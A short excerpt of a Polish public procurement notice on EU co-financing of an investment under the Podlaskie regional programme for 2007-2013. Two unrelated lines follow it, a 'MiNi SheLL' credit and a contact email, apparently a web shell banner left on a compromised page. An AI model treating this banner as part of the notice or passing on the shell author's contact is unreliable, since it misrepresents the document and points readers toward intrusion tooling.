<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja będzie realizowana przy dofinansowaniu ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com